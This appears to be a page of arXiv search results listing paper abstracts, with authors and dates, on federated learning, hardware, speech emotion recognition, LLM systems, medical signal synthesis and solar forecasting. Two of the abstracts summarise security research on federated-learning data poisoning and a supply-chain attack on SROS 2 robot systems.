Test-time personalization in federated learning enables models at clients to adjust online to local domain shifts, enhancing robustness and personalization in deployment. Yet, existing federated learning work largely overlooks the security risks that arise when local adaptation occurs at test time. Heterogeneous domain arrivals, diverse adaptation algorithms, and limited cross-client visibility create vulnerabilities where compromised participants can craft poisoned inputs and submit adversarial updates that undermine both global and per-client performance. To address this threat, we introduce FedPoisonTTP, a realistic grey-box attack framework that explores test-time data poisoning in the federated adaptation setting. FedPoisonTTP distills a surrogate model from adversarial queries, synthesizes in-distribution poisons using feature-consistency, and optimizes attack objectives to generate high-entropy or class-confident poisons that evade common adaptation filters. These poisons are injected during local adaptation and spread through collaborative updates, leading to broad degradation. Extensive experiments on corrupted vision benchmarks show that compromised participants can substantially diminish overall test-time performance.
△ Less
Submitted 24 November, 2025;
originally announced November 2025.
-
pFedBBN: A Personalized Federated Test-Time Adaptation with Balanced Batch Normalization for Class-Imbalanced Data
Authors:
Md Akil Raihan Iftee,
Syed Md. Ahnaf Hasan,
Mir Sazzat Hossain,
Rakibul Hasan Rajib,
Amin Ahsan Ali,
AKM Mahbubur Rahman,
Sajib Mistry,
Monowar Bhuyan
Abstract:
Test-time adaptation (TTA) in federated learning (FL) is crucial for handling unseen data distributions across clients, particularly when faced with domain shifts and skewed class distributions. Class Imbalance (CI) remains a fundamental challenge in FL, where rare but critical classes are often severely underrepresented in individual client datasets. Although prior work has addressed CI during tr…
▽ More
Test-time adaptation (TTA) in federated learning (FL) is crucial for handling unseen data distributions across clients, particularly when faced with domain shifts and skewed class distributions. Class Imbalance (CI) remains a fundamental challenge in FL, where rare but critical classes are often severely underrepresented in individual client datasets. Although prior work has addressed CI during training through reliable aggregation and local class distribution alignment, these methods typically rely on access to labeled data or coordination among clients, and none address class unsupervised adaptation to dynamic domains or distribution shifts at inference time under federated CI constraints. Revealing the failure of state-of-the-art TTA in federated client adaptation in CI scenario, we propose pFedBBN,a personalized federated test-time adaptation framework that employs balanced batch normalization (BBN) during local client adaptation to mitigate prediction bias by treating all classes equally, while also enabling client collaboration guided by BBN similarity, ensuring that clients with similar balanced representations reinforce each other and that adaptation remains aligned with domain-specific characteristics. pFedBBN supports fully unsupervised local adaptation and introduces a class-aware model aggregation strategy that enables personalized inference without compromising privacy. It addresses both distribution shifts and class imbalance through balanced feature normalization and domain-aware collaboration, without requiring any labeled or raw data from clients. Extensive experiments across diverse baselines show that pFedBBN consistently enhances robustness and minority-class performance over state-of-the-art FL and TTA methods.
△ Less
Submitted 22 November, 2025;
originally announced November 2025.
-
A Dual-Memory Ferroelectric Transistor Emulating Synaptic Metaplasticity for High-Speed Reservoir Computing
Authors:
Yifan Wang,
Muhammad Sakib Shahriar,
Salma Soliman,
Noah Vaillancourt,
Lance Fernandes,
Andrea Padovani,
Asif Islam Khan,
Md Sakib Hasan,
Raisul Islam
Abstract:
The exponential growth of edge artificial intelligence demands material-focused solutions to overcome energy consumption and latency limitations when processing real-time temporal data. Physical reservoir computing (PRC) offers an energy-efficient paradigm but faces challenges due to limited device scalability and reconfigurability. Additionally, reservoir and readout layers require memory of diff…
▽ More
The exponential growth of edge artificial intelligence demands material-focused solutions to overcome energy consumption and latency limitations when processing real-time temporal data. Physical reservoir computing (PRC) offers an energy-efficient paradigm but faces challenges due to limited device scalability and reconfigurability. Additionally, reservoir and readout layers require memory of different timescales, short-term and long-term respectively - a material challenge hindering CMOS-compatible implementations. This work demonstrates a CMOS-compatible ferroelectric transistor using hafnium-zirconium-oxide (HZO) and silicon, enabling dual-memory operation. This system exhibits non-volatile long-term memory (LTM) from ferroelectric HZO polarization and volatile short-term memory (STM) from engineered non-quasi-static (NQS) channel-charge relaxation driven by gate-source/drain overlap capacitance. Ferroelectric polarization acts as non-volatile programming of volatile dynamics: by modulating threshold voltage, the ferroelectric state deterministically switches the NQS time constant and computational behavior between paired-pulse facilitation (PPF) and depression (PPD). This establishes a generalizable material-design principle applicable to diverse ferroelectric-semiconductor heterostructures, extending beyond silicon to oxide semiconductors and heterogeneously-integrated systems. The device solves second-order nonlinear tasks with 3.69 x 10^-3 normalized error using only 16 reservoir states - ~5x reduction - achieving 20 us response time (~1000x faster) and 1.5 x 10^-7 J energy consumption, providing an immediately manufacturable pathway for neuromorphic hardware and energy-efficient edge intelligence.
△ Less
Submitted 10 November, 2025;
originally announced November 2025.
-
Emotion Detection in Speech Using Lightweight and Transformer-Based Models: A Comparative and Ablation Study
Authors:
Lucky Onyekwelu-Udoka,
Md Shafiqul Islam,
Md Shahedul Hasan
Abstract:
Emotion recognition from speech plays a vital role in the development of empathetic human-computer interaction systems. This paper presents a comparative analysis of lightweight transformer-based models, DistilHuBERT and PaSST, by classifying six core emotions from the CREMA-D dataset. We benchmark their performance against a traditional CNN-LSTM baseline model using MFCC features. DistilHuBERT de…
▽ More
Emotion recognition from speech plays a vital role in the development of empathetic human-computer interaction systems. This paper presents a comparative analysis of lightweight transformer-based models, DistilHuBERT and PaSST, by classifying six core emotions from the CREMA-D dataset. We benchmark their performance against a traditional CNN-LSTM baseline model using MFCC features. DistilHuBERT demonstrates superior accuracy (70.64%) and F1 score (70.36%) while maintaining an exceptionally small model size (0.02 MB), outperforming both PaSST and the baseline. Furthermore, we conducted an ablation study on three variants of the PaSST, Linear, MLP, and Attentive Pooling heads, to understand the effect of classification head architecture on model performance. Our results indicate that PaSST with an MLP head yields the best performance among its variants but still falls short of DistilHuBERT. Among the emotion classes, angry is consistently the most accurately detected, while disgust remains the most challenging. These findings suggest that lightweight transformers like DistilHuBERT offer a compelling solution for real-time speech emotion recognition on edge devices. The code is available at: https://github.com/luckymaduabuchi/Emotion-detection-.
△ Less
Submitted 1 November, 2025;
originally announced November 2025.
-
Supply Chain Exploitation of Secure ROS 2 Systems: A Proof-of-Concept on Autonomous Platform Compromise via Keystore Exfiltration
Authors:
Tahmid Hasan Sakib,
Yago Romano Martinez,
Carter Brady,
Syed Rafay Hasan,
Terry N. Guo
Abstract:
This paper presents a proof-of-concept supply chain attack against the Secure ROS 2 (SROS 2) framework, demonstrated on a Quanser QCar2 autonomous vehicle platform. A Trojan-infected Debian package modifies core ROS 2 security commands to exfiltrate newly generated keystore credentials via DNS in base64-encoded chunks to an attacker-controlled nameserver. Possession of these credentials enables th…
▽ More
This paper presents a proof-of-concept supply chain attack against the Secure ROS 2 (SROS 2) framework, demonstrated on a Quanser QCar2 autonomous vehicle platform. A Trojan-infected Debian package modifies core ROS 2 security commands to exfiltrate newly generated keystore credentials via DNS in base64-encoded chunks to an attacker-controlled nameserver. Possession of these credentials enables the attacker to rejoin the SROS 2 network as an authenticated participant and publish spoofed control or perception messages without triggering authentication failures. We evaluate this capability on a secure ROS 2 Humble testbed configured for a four-stop-sign navigation routine using an Intel RealSense camera for perception. Experimental results show that control-topic injections can cause forced braking, sustained high-speed acceleration, and continuous turning loops, while perception-topic spoofing can induce phantom stop signs or suppress real detections. The attack generalizes to any data distribution service (DDS)-based robotic system using SROS 2, highlighting the need for both supply chain integrity controls and runtime semantic validation to safeguard autonomous systems against insider and impersonation threats.
△ Less
Submitted 31 October, 2025;
originally announced November 2025.
-
Collective Communication for 100k+ GPUs
Authors:
Min Si,
Pavan Balaji,
Yongzhou Chen,
Ching-Hsiang Chu,
Adi Gangidi,
Saif Hasan,
Subodh Iyengar,
Dan Johnson,
Bingzhe Liu,
Regina Ren,
Deep Shah,
Ashmitha Jeevaraj Shetty,
Greg Steinbrecher,
Yulun Wang,
Bruce Wu,
Xinfeng Xie,
Jingyi Yang,
Mingran Yang,
Kenny Yu,
Minlan Yu,
Cen Zhao,
Wes Bland,
Denis Boyda,
Suman Gumudavelli,
Prashanth Kannan
, et al. (14 additional authors not shown)
Abstract:
The increasing scale of large language models (LLMs) necessitates highly efficient collective communication frameworks, particularly as training workloads extend to hundreds of thousands of GPUs. Traditional communication methods face significant throughput and latency limitations at this scale, hindering both the development and deployment of state-of-the-art models. This paper presents the NCCLX…
▽ More
The increasing scale of large language models (LLMs) necessitates highly efficient collective communication frameworks, particularly as training workloads extend to hundreds of thousands of GPUs. Traditional communication methods face significant throughput and latency limitations at this scale, hindering both the development and deployment of state-of-the-art models. This paper presents the NCCLX collective communication framework, developed at Meta, engineered to optimize performance across the full LLM lifecycle, from the synchronous demands of large-scale training to the low-latency requirements of inference. The framework is designed to support complex workloads on clusters exceeding 100,000 GPUs, ensuring reliable, high-throughput, and low-latency data exchange. Empirical evaluation on the Llama4 model demonstrates substantial improvements in communication efficiency. This research contributes a robust solution for enabling the next generation of LLMs to operate at unprecedented scales.
△ Less
Submitted 9 January, 2026; v1 submitted 22 October, 2025;
originally announced October 2025.
-
An Explorative Study on Distributed Computing Techniques in Training and Inference of Large Language Models
Authors:
Sheikh Azizul Hakim,
Saem Hasan
Abstract:
Large language models (LLM) are advanced AI systems trained on extensive textual data, leveraging deep learning techniques to understand and generate human-like language. Today's LLMs with billions of parameters are so huge that hardly any single computing node can train, fine-tune, or infer from them. Therefore, several distributed computing techniques are being introduced in the literature to pr…
▽ More
Large language models (LLM) are advanced AI systems trained on extensive textual data, leveraging deep learning techniques to understand and generate human-like language. Today's LLMs with billions of parameters are so huge that hardly any single computing node can train, fine-tune, or infer from them. Therefore, several distributed computing techniques are being introduced in the literature to properly utilize LLMs. We have explored the application of distributed computing techniques in LLMs from two angles.
\begin{itemize}
\item We study the techniques that democratize the LLM, that is, how large models can be run on consumer-grade computers. Here, we also implement a novel metaheuristics-based modification to an existing system.
\item We perform a comparative study on three state-of-the-art LLM serving techniques. \end{itemize}
△ Less
Submitted 13 October, 2025;
originally announced October 2025.
-
High-Fidelity Synthetic ECG Generation via Mel-Spectrogram Informed Diffusion Training
Authors:
Zhuoyi Huang,
Nutan Sahoo,
Anamika Kumari,
Girish Kumar,
Kexuan Cai,
Shixing Cao,
Yue Kang,
Tian Xia,
Somya Chatterjee,
Nicholas Hausman,
Aidan Jay,
Eric S. Rosenthal,
Soundar Srinivasan,
Sadid Hasan,
Alex Fedorov,
Sulaiman Vesal
Abstract:
The development of machine learning for cardiac care is severely hampered by privacy restrictions on sharing real patient electrocardiogram (ECG) data. Although generative AI offers a promising solution, the real-world use of existing model-synthesized ECGs is limited by persistent gaps in trustworthiness and clinical utility. In this work, we address two major shortcomings of current generative E…
▽ More
The development of machine learning for cardiac care is severely hampered by privacy restrictions on sharing real patient electrocardiogram (ECG) data. Although generative AI offers a promising solution, the real-world use of existing model-synthesized ECGs is limited by persistent gaps in trustworthiness and clinical utility. In this work, we address two major shortcomings of current generative ECG methods: insufficient morphological fidelity and the inability to generate personalized, patient-specific physiological signals. To address these gaps, we build on a conditional diffusion-based Structured State Space Model (SSSD-ECG) with two principled innovations: (1) MIDT-ECG (Mel-Spectrogram Informed Diffusion Training), a novel training paradigm with time-frequency domain supervision to enforce physiological structural realism, and (2) multi-modal demographic conditioning to enable patient-specific synthesis. We comprehensively evaluate our approach on the PTB-XL dataset, assessing the synthesized ECG signals on fidelity, clinical coherence, privacy preservation, and downstream task utility. MIDT-ECG achieves substantial gains: it improves morphological coherence, preserves strong privacy guarantees with all metrics evaluated exceeding the baseline by 4-8%, and notably reduces the interlead correlation error by an average of 74%, while demographic conditioning enhances signal-to-noise ratio and personalization. In critical low-data regimes, a classifier trained on datasets supplemented with our synthetic ECGs achieves performance comparable to a classifier trained solely on real data. Together, we demonstrate that ECG synthesizers, trained with the proposed time-frequency structural regularization scheme, can serve as personalized, high-fidelity, privacy-preserving surrogates when real data are scarce, advancing the responsible use of generative AI in healthcare.
△ Less
Submitted 8 October, 2025; v1 submitted 6 October, 2025;
originally announced October 2025.
-
One Head, Many Models: Cross-Attention Routing for Cost-Aware LLM Selection
Authors:
Roshini Pulishetty,
Mani Kishan Ghantasala,
Keerthy Kaushik Dasoju,
Niti Mangwani,
Vishal Garimella,
Aditya Mate,
Somya Chatterjee,
Yue Kang,
Ehi Nosakhare,
Sadid Hasan,
Soundar Srinivasan
Abstract:
The proliferation of large language models (LLMs) with varying computational costs and performance profiles presents a critical challenge for scalable, cost-effective deployment in real-world applications. We introduce a unified routing framework that leverages a single-head cross-attention mechanism to jointly model query and model embeddings, enabling dynamic selection of the optimal LLM for eac…
▽ More
The proliferation of large language models (LLMs) with varying computational costs and performance profiles presents a critical challenge for scalable, cost-effective deployment in real-world applications. We introduce a unified routing framework that leverages a single-head cross-attention mechanism to jointly model query and model embeddings, enabling dynamic selection of the optimal LLM for each input query. Our approach is evaluated on RouterBench, a large-scale, publicly available benchmark encompassing diverse LLM pools and domains. By explicitly capturing fine-grained query-model interactions, our router predicts both response quality and generation cost, achieving up to 6.6% improvement in Average Improvement in Quality (AIQ) and 2.9% in maximum performance over existing routers. To robustly balance performance and cost, we propose an exponential reward function that enhances stability across user preferences. The resulting architecture is lightweight, generalizes effectively across domains, and demonstrates improved efficiency compared to prior methods, establishing a new standard for cost-aware LLM routing.
△ Less
Submitted 11 September, 2025;
originally announced September 2025.
-
Handling Open-Vocabulary Constructs in Formalizing Specifications: Retrieval-Augmented Parsing with Expert Knowledge
Authors:
Mohammad Saqib Hasan,
Sayontan Ghosh,
Dhruv Verma,
Geoff Kuenning,
Erez Zadok,
Scott A. Smolka,
Niranjan Balasubramanian
Abstract:
We study the problem of Open-Vocabulary Constructs(OVCs) -- ones not known beforehand -- in the context of converting natural language (NL) specifications into formal languages (e.g., temporal logic or code). Models fare poorly on OVCs due to a lack of necessary knowledge a priori. In such situations, a domain expert can provide correct constructs at inference time based on their preferences or do…
▽ More
We study the problem of Open-Vocabulary Constructs(OVCs) -- ones not known beforehand -- in the context of converting natural language (NL) specifications into formal languages (e.g., temporal logic or code). Models fare poorly on OVCs due to a lack of necessary knowledge a priori. In such situations, a domain expert can provide correct constructs at inference time based on their preferences or domain knowledge. Our goal is to effectively reuse this inference-time, expert-provided knowledge for future parses without retraining the model. We present dynamic knowledge-augmented parsing(DKAP), where in addition to the input sentence, the model receives (dynamically growing) expert knowledge as a key-value lexicon that associates NL phrases with correct OVC constructs. We propose ROLex, a retrieval-augmented parsing approach that uses this lexicon. A retriever and a generator are trained to find and use the key-value store to produce the correct parse. A key challenge lies in curating data for this retrieval-augmented parser. We utilize synthetic data generation and the data augmentation techniques on annotated (NL sentence, FL statement) pairs to train the augmented parser. To improve training effectiveness, we propose multiple strategies to teach models to focus on the relevant subset of retrieved knowledge. Finally, we introduce a new evaluation paradigm modeled after the DKAP problem and simulate the scenario across three formalization tasks (NL2LTL, NL2Code, and NL2CMD). Our evaluations show that DKAP is a difficult challenge, and ROLex helps improve the performance of baseline models by using dynamic expert knowledge effectively.
△ Less
Submitted 10 September, 2025;
originally announced September 2025.
-
ProST: Progressive Sub-task Training for Pareto-Optimal Multi-agent Systems Using Small Language Models
Authors:
Biddut Sarker Bijoy,
Mohammad Saqib Hasan,
Pegah Alipoormolabashi,
Avirup Sil,
Aruna Balasubramanian,
Niranjan Balasubramanian
Abstract:
Multi-agent systems with smaller language models (SLMs) present a viable alternative to single agent systems powered by large language models (LLMs) for addressing complex problems. In this work, we study how these alternatives compare in terms of both effectiveness and efficiency. To study this trade-off, we instantiate single and multi-agent systems for the complex problems in the AppWorld envir…
▽ More
Multi-agent systems with smaller language models (SLMs) present a viable alternative to single agent systems powered by large language models (LLMs) for addressing complex problems. In this work, we study how these alternatives compare in terms of both effectiveness and efficiency. To study this trade-off, we instantiate single and multi-agent systems for the complex problems in the AppWorld environment using different sized language models.
We find that difficulties with long-trajectory learning in smaller language models (SLMs) limit their performance. Even when trained for specialized roles, SLMs fail to learn all subtasks effectively. To address this issue, we introduce a simple progressive sub-task training strategy, which introduces new sub-tasks progressively in each training epoch. We find that this novel strategy, analogous to instance level curriculum learning, consistently improves the effectiveness of multi-agents at all configurations. Our Pareto analysis shows that fine-tuned multi-agent systems yield better effectiveness-efficiency trade-offs. Additional ablations and analyses shows the importance of our progressive training strategy and its ability to reduce subtask error rates.
△ Less
Submitted 11 November, 2025; v1 submitted 2 September, 2025;
originally announced September 2025.
-
Automatic Question & Answer Generation Using Generative Large Language Model (LLM)
Authors:
Md. Alvee Ehsan,
A. S. M Mehedi Hasan,
Kefaya Benta Shahnoor,
Syeda Sumaiya Tasneem
Abstract:
In the realm of education, student evaluation holds equal significance to imparting knowledge. To be evaluated, students usually need to go through text-based academic assessment methods. Instructors need to make a diverse set of questions that need to be fair for all students to prove their adequacy over a particular topic. This can prove to be quite challenging as they may need to manually go th…
▽ More
In the realm of education, student evaluation holds equal significance to imparting knowledge. To be evaluated, students usually need to go through text-based academic assessment methods. Instructors need to make a diverse set of questions that need to be fair for all students to prove their adequacy over a particular topic. This can prove to be quite challenging as they may need to manually go through several different lecture materials. Our objective is to make this whole process much easier by implementing Automatic Question Answer Generation(AQAG), using a fine-tuned generative LLM. For tailoring the instructor's preferred question style (MCQ, conceptual, or factual questions), Prompt Engineering (PE) is being utilized. In this research, we propose to leverage unsupervised learning methods in NLP, primarily focusing on the English language. This approach empowers the base Meta-Llama 2-7B model to integrate the RACE dataset as training data for the fine-tuning process. Creating a customized model that will offer efficient solutions for educators, instructors, and individuals engaged in text-based evaluations. A reliable and efficient tool for generating questions and answers can free up valuable time and resources, thus streamlining their evaluation processes.
△ Less
Submitted 28 September, 2025; v1 submitted 26 August, 2025;
originally announced August 2025.
-
Angular phase-space integrals with four denominators through Mellin--Barnes
Authors:
Taushif Ahmed,
Syed Mehedi Hasan,
Andreas Rapakoulias
Abstract:
We compute four-denominator angular phase-space integrals using the Mellin--Barnes (MB) technique in dimensional regularisation. Independent of the scattering process, an angular integral can be categorised based on the nature of the momenta appearing in the denominators. We address all scenarios involving fully massless and massive momenta. We present a partial fraction decomposition that relates…
▽ More
We compute four-denominator angular phase-space integrals using the Mellin--Barnes (MB) technique in dimensional regularisation. Independent of the scattering process, an angular integral can be categorised based on the nature of the momenta appearing in the denominators. We address all scenarios involving fully massless and massive momenta. We present a partial fraction decomposition that relates angular integrals with multiple massive momenta to those with a single massive momentum. By solving six- and seven-fold MB integrals, we express the final results up to the finite order in the dimensional regulator in terms of Goncharov polylogarithms.
△ Less
Submitted 21 August, 2025;
originally announced August 2025.
-
Improving MSA Estimation through Adaptive Weight Vectors in MOEA/D
Authors:
Saem Hasan,
Muhammad Ali Nayeem,
M. Sohel Rahman
Abstract:
Accurate phylogenetic inference from biological sequences depends critically on the quality of multiple sequence alignments, yet optimal alignment for many sequences is computationally intractable and sensitive to scoring choices. In this work we introduce MOEA/D-ADF, a novel variant of MOEA/D that adaptively adjusts subproblem weight vectors based on fitness variance to improve the exploration-ex…
▽ More
Accurate phylogenetic inference from biological sequences depends critically on the quality of multiple sequence alignments, yet optimal alignment for many sequences is computationally intractable and sensitive to scoring choices. In this work we introduce MOEA/D-ADF, a novel variant of MOEA/D that adaptively adjusts subproblem weight vectors based on fitness variance to improve the exploration-exploitation trade-off. We combine MOEA/D-ADF with PMAO (PASTA with many application-aware optimization criteria) to form PMAO++, where PMAO-generated solutions are used to seed MOEA/D-ADF, which then evolves a population using 30 weight vectors to produce a diverse ensemble of alignment-tree pairs. PMAO++ outperforms the original PMAO on a majority of benchmark cases, achieving better false-negative (FN) rates on 12 of 17 BAliBASE-derived datasets and producing superior best-case trees, including several instances with zero FN rate. Beyond improving single best alignments, the rich set of alignment-tree pairs produced by PMAO++ is especially valuable for downstream summary methods (for example, consensus and summary-tree approaches), allowing more robust phylogenetic inference by integrating signal across multiple plausible alignments and trees. Certain dataset features, such as large terminal N/C extensions found in the RV40 group, remain challenging, but overall PMAO++ demonstrates clear advantages for sequence-based phylogenetic analysis. Future work will explore parameter tuning, larger benchmark suites, and tighter integration with summary-tree pipelines to further enhance applicability for biological sequence studies.
△ Less
Submitted 16 August, 2025;
originally announced August 2025.
-
Benchmark Dataset Generation and Evaluation for Excel Formula Repair with LLMs
Authors:
Ananya Singha,
Harshita Sahijwani,
Walt Williams,
Emmanuel Aboah Boateng,
Nick Hausman,
Miguel Di Luca,
Keegan Choudhury,
Chaya Binet,
Vu Le,
Tianwei Chen,
Oryan Rokeah Chen,
Sulaiman Vesal,
Sadid Hasan
Abstract:
Excel is a pervasive yet often complex tool, particularly for novice users, where runtime errors arising from logical mistakes or misinterpretations of functions pose a significant challenge. While large language models (LLMs) offer promising assistance by explaining formula errors, the automated correction of these semantic runtime errors remains an open problem. A primary challenge to advancing…
▽ More
Excel is a pervasive yet often complex tool, particularly for novice users, where runtime errors arising from logical mistakes or misinterpretations of functions pose a significant challenge. While large language models (LLMs) offer promising assistance by explaining formula errors, the automated correction of these semantic runtime errors remains an open problem. A primary challenge to advancing models for such scenarios is the severe lack of high-quality, comprehensive datasets for training and rigorous evaluation. This paper addresses this gap by introducing a novel approach for constructing a benchmark dataset specifically designed for Excel formula repair. We propose a data generation pipeline, which leverages a small set of curated seed samples from online forums to synthetically expand the dataset. Our pipeline integrates few-shot prompting with LLMs and employs a robust \textit{LLM-as-a-Judge} validation framework, combined with execution-based checks to ensure the correctness and semantic fidelity of the generated data. This process produced a benchmark dataset of 618 high-quality samples, covering common runtime errors. Furthermore, we propose a context-aware baseline technique for Excel formula repair that utilizes LLMs to leverage both the faulty formula, and relevant spreadsheet context. We evaluate the performance of various LLMs (GPT-4o, GPT-4.1, Phi-3, Mistral) on our newly generated benchmark using execution-based metrics. Our analysis demonstrates the dataset's quality through manual annotation and provides insights into error and function distributions. The proposed generation methodology is highly scalable and can be readily adapted to create evaluation benchmarks for similar code repair tasks in other low-resource programming languages.
△ Less
Submitted 14 August, 2025;
originally announced August 2025.
-
Auto-Eval Judge: Towards a General Agentic Framework for Task Completion Evaluation
Authors:
Roshita Bhonsle,
Rishav Dutta,
Sneha Vavilapalli,
Harsh Seth,
Abubakarr Jaye,
Yapei Chang,
Mukund Rungta,
Emmanuel Aboah Boateng,
Sadid Hasan,
Ehi Nosakhare,
Soundar Srinivasan
Abstract:
The increasing adoption of foundation models as agents across diverse domains necessitates a robust evaluation framework. Current methods, such as LLM-as-a-Judge, focus only on final outputs, overlooking the step-by-step reasoning that drives agentic decision-making. Meanwhile, existing Agent-as-a-Judge systems, where one agent evaluates another's task completion, are typically designed for narrow…
▽ More
The increasing adoption of foundation models as agents across diverse domains necessitates a robust evaluation framework. Current methods, such as LLM-as-a-Judge, focus only on final outputs, overlooking the step-by-step reasoning that drives agentic decision-making. Meanwhile, existing Agent-as-a-Judge systems, where one agent evaluates another's task completion, are typically designed for narrow, domain-specific settings. To address this gap, we propose a generalizable, modular framework for evaluating agent task completion independent of the task domain. The framework emulates human-like evaluation by decomposing tasks into sub-tasks and validating each step using available information, such as the agent's output and reasoning. Each module contributes to a specific aspect of the evaluation process, and their outputs are aggregated to produce a final verdict on task completion. We validate our framework by evaluating the Magentic-One Actor Agent on two benchmarks, GAIA and BigCodeBench. Our Judge Agent predicts task success with closer agreement to human evaluations, achieving 4.76% and 10.52% higher alignment accuracy, respectively, compared to the GPT-4o based LLM-as-a-Judge baseline. This demonstrates the potential of our proposed general-purpose evaluation framework.
△ Less
Submitted 7 August, 2025;
originally announced August 2025.
-
A Study of Gender Classification Techniques Based on Iris Images: A Deep Survey and Analysis
Authors:
Basna Mohammed Salih Hasan,
Ramadhan J. Mstafa
Abstract:
Gender classification is attractive in a range of applications, including surveillance and monitoring, corporate profiling, and human-computer interaction. Individuals' identities may be gleaned from information about their gender, which is a kind of soft biometric. Over the years, several methods for determining a person's gender have been devised. Some of the most well-known ones are based on ph…
▽ More
Gender classification is attractive in a range of applications, including surveillance and monitoring, corporate profiling, and human-computer interaction. Individuals' identities may be gleaned from information about their gender, which is a kind of soft biometric. Over the years, several methods for determining a person's gender have been devised. Some of the most well-known ones are based on physical characteristics like face, fingerprint, palmprint, DNA, ears, gait, and iris. On the other hand, facial features account for the vast majority of gender classification methods. Also, the iris is a significant biometric trait because the iris, according to research, remains basically constant during an individual's life. Besides that, the iris is externally visible and is non-invasive to the user, which is important for practical applications. Furthermore, there are already high-quality methods for segmenting and encoding iris images, and the current methods facilitate selecting and extracting attribute vectors from iris textures. This study discusses several approaches to determining gender. The previous works of literature are briefly reviewed. Additionally, there are a variety of methodologies for different steps of gender classification. This study provides researchers with knowledge and analysis of the existing gender classification approaches. Also, it will assist researchers who are interested in this specific area, as well as highlight the gaps and challenges in the field, and finally provide suggestions and future paths for improvement.
△ Less
Submitted 8 August, 2025; v1 submitted 7 August, 2025;
originally announced August 2025.
-
Semi-Supervised Deep Domain Adaptation for Predicting Solar Power Across Different Locations
Authors:
Md Shazid Islam,
A S M Jahid Hasan,
Md Saydur Rahman,
Md Saiful Islam Sajol
Abstract:
Accurate solar generation prediction is essential for proper estimation of renewable energy resources across diverse geographic locations. However, geographical and weather features vary from location to location which introduces domain shift - a major bottleneck to develop location-agnostic prediction model. As a result, a machine-learning model which can perform well to predict solar power in on…
▽ More
Accurate solar generation prediction is essential for proper estimation of renewable energy resources across diverse geographic locations. However, geographical and weather features vary from location to location which introduces domain shift - a major bottleneck to develop location-agnostic prediction model. As a result, a machine-learning model which can perform well to predict solar power in one location, may exhibit subpar performance in another location. Moreover, the lack of properly labeled data and storage issues make the task even more challenging. In order to address domain shift due to varying weather conditions across different meteorological regions, this paper presents a semi-supervised deep domain adaptation framework, allowing accurate predictions with minimal labeled data from the target location. Our approach involves training a deep convolutional neural network on a source location's data and adapting it to the target location using a source-free, teacher-student model configuration. The teacher-student model leverages consistency and cross-entropy loss for semi-supervised learning, ensuring effective adaptation without any source data requirement for prediction. With annotation of only $20 \%$ data in the target domain, our approach exhibits an improvement upto $11.36 \%$, $6.65 \%$, $4.92\%$ for California, Florida and New York as target domain, respectively in terms of accuracy in predictions with respect to non-adaptive approach.
△ Less
Submitted 6 August, 2025;
originally announced August 2025.
-
Exploring the Feasibility of Deep Learning Techniques for Accurate Gender Classification from Eye Images
Authors:
Basna Mohammed Salih Hasan,
Ramadhan J. Mstafa
Abstract:
Gender classification has emerged as a crucial aspect in various fields, including security, human-machine interaction, surveillance, and advertising. Nonetheless, the accuracy of this classification can be influenced by factors such as cosmetics and disguise. Consequently, our study is dedicated to addressing this concern by concentrating on gender classification using color images of the periocu…
▽ More
Gender classification has emerged as a crucial aspect in various fields, including security, human-machine interaction, surveillance, and advertising. Nonetheless, the accuracy of this classification can be influenced by factors such as cosmetics and disguise. Consequently, our study is dedicated to addressing this concern by concentrating on gender classification using color images of the periocular region. The periocular region refers to the area surrounding the eye, including the eyelids, eyebrows, and the region between them. It contains valuable visual cues that can be used to extract key features for gender classification. This paper introduces a sophisticated Convolutional Neural Network (CNN) model that utilizes color image databases to evaluate the effectiveness of the periocular region for gender classification. To validate the model's performance, we conducted tests on two eye datasets, namely CVBL and (Female and Male). The recommended architecture achieved an outstanding accuracy of 99% on the previously unused CVBL dataset while attaining a commendable accuracy of 96% with a small number of learnable parameters (7,235,089) on the (Female and Male) dataset. To ascertain the effectiveness of our proposed model for gender classification using the periocular region, we evaluated its performance through an extensive range of metrics and compared it with other state-of-the-art approaches. The results unequivocally demonstrate the efficacy of our model, thereby suggesting its potential for practical application in domains such as security and surveillance.
△ Less
Submitted 7 August, 2025; v1 submitted 31 July, 2025;
originally announced August 2025.
-
Optimizing Solar Energy Production in the USA: Time-Series Analysis Using AI for Smart Energy Management
Authors:
Istiaq Ahmed,
Md Asif Ul Hoq Khan,
MD Zahedul Islam,
Md Sakibul Hasan,
Tanaya Jakir,
Arat Hossain,
Joynal Abed,
Muhammad Hasanuzzaman,
Sadia Sharmeen Shatyi,
Kazi Nehal Hasnain
Abstract:
As the US rapidly moves towards cleaner energy sources, solar energy is fast becoming the pillar of its renewable energy mix. Even while solar energy is increasingly being used, its variability is a key hindrance to grid stability, storage efficiency, and system stability overall. Solar energy has emerged as one of the fastest-growing renewable energy sources in the United States, adding noticeabl…
▽ More
As the US rapidly moves towards cleaner energy sources, solar energy is fast becoming the pillar of its renewable energy mix. Even while solar energy is increasingly being used, its variability is a key hindrance to grid stability, storage efficiency, and system stability overall. Solar energy has emerged as one of the fastest-growing renewable energy sources in the United States, adding noticeably to the country's energy mix. Retrospectively, the necessity of inserting the sun's energy into the grid without disrupting reliability and cost efficiencies highlights the necessity of good forecasting software and smart control systems. The dataset utilized for this research project comprised both hourly and daily solar energy production records collected from multiple utility-scale solar farms across diverse U.S. regions, including California, Texas, and Arizona. Training and evaluation of all models were performed with a time-based cross-validation scheme, namely, sliding window validation. Both the Random Forest and the XG-Boost models demonstrated noticeably greater and the same performance across each of the measures considered, with relatively high accuracy. The almost perfect and equal performance by the Random Forest and XG-Boost models also shows both models to have learned the patterns in the data very comprehensively, with high reliability in their predictions. By incorporating AI-powered time-series models like XG-Boost in grid management software, utility companies can dynamically modify storage cycles in real-time as well as dispatch and peak load planning, based on their predictions. AI-powered solar forecasting also has profound implications for renewable energy policy and planning, particularly as U.S. federal and state governments accelerate toward ambitious decarbonization goals.
△ Less
Submitted 29 June, 2025;
originally announced June 2025.
-
From Model Design to Organizational Design: Complexity Redistribution and Trade-Offs in Generative AI
Authors:
Sharique Hasan,
Alexander Oettl,
Sampsa Samila
Abstract:
This paper introduces the Generality-Accuracy-Simplicity (GAS) framework to analyze how large language models (LLMs) are reshaping organizations and competitive strategy. We argue that viewing AI as a simple reduction in input costs overlooks two critical dynamics: (a) the inherent trade-offs among generality, accuracy, and simplicity, and (b) the redistribution of complexity across stakeholders.…
▽ More
